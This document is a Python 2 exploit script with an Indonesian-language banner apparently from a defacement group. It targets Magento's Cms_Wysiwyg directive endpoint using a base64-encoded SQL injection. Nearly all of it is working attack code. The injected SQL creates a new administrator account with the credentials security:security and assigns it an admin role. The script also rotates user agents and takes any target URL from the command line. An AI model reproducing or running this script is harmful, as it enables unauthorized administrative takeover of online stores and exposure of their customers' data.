exploit magento add admin

#!/usr/bin/python
#Ref : https://www.exploit-db.com/exploits/37977/
import sys
try:
    import requests
except:
    print "Modul requests belum ter-install"
    sys.exit()
import base64,random,os
os.system('clear')
judul ="""
      __  ______  __________  ____________
     /  |/  / _ |/ ___/ __/ |/ /_  __/ __ \
    / /|_/ / __ / (_ / _//    / / / / /_/ /
   /_/__/_/_/_|_\___/___/_/|_/_/_/ _\____/_____  __
     / _ | / _ \/ _ \  / _ | / _ \/  |/  /  _/ |/ /
    / __ |/ // / // / / __ |/ // / /|_/ // //    /
   /_/ |_/____/____/ /_/ |_/____/_/  /_/___/_/|_/
CODED BY : SECURITY007
EMAIL    : defacementsec007@gmail.com
*Exploit sukses tapi gak bisa login?
coba ganti username dan password di dalam script ini!!
"""
print judul
def exploit(url):
    target = url + "/admin/Cms_Wysiwyg/directive/index/"
    xm = """
    SET @SALT = 'rp';
    SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
    SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
    INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
    INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
    """
    useragent = ['Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3','Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)','Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)','Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)','Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)']
    ua = random.choice(useragent)
    print "[+] Menambah username dan password baru"
    ku = xm.replace("\n", "").format(username="security", password="security")#ganti apabila gagal login
    pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(ku)
    try:
        r = requests.post(target,data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ","filter": base64.b64encode(pfilter),"forwarded": 1},headers={'User-Agent':ua})
    except:
        print "[!] tidak bisa konek ke target"
        sys.exit()
    if r.ok:
        print "[+] Exploit sukses"
        print "cek {0}/admin dengan user:password security:security".format(url)#ganti security:security dengan password dan username yang kalian ubah diatas
    else:
        print "[!] Exploit gagal"
def main():
    if len(sys.argv)!=2:
        print "Usage python "+sys.argv[0]+" <target>"
    else:
        print "[+] Sedang meng-exploit target"
        exploit(sys.argv[1])
if __name__=="__main__":
    main()